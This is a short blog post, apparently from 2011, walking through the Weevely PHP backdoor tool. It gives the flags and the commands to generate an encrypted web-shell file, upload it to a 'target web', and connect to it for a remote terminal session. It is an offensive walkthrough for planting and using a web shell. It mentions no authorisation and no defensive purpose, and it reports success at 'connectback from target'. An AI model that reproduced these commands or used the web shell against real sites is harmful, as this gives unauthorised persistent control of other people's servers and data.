Senin, 17 Oktober 2011



weevely is a kind of backdoor php which is used to make connectback or get a shell on the target web that has beenuploaded backdoor. most websites do not provide remote facilityor ssh from the target, with weevely we can do a remote terminalthrough ssh and run as a user.


this time we try to generate php backdoor using weevely and connectback form the target. let's start,,!!!




-g = Generate backdoor crypted code 
-p = your password 
-o = OUTPUT
-t = Start a terminal-like session 
-u = remote backdoor URL

[+] go to your directory weevely for example at back|track /pentest/backdoors/web/weevely  and run command ./main.py -g -p pr3k3t3k -o conf.php






[+] now the backdoor have ready to upload
[+] if the backdoor has uploaded, now we try to connectback from the target ./main.py -t -u  http://192.168.56.101/conf.php -p pr3k3t3k




now we have successfully connectback from target





0 komentar:

Posting Komentar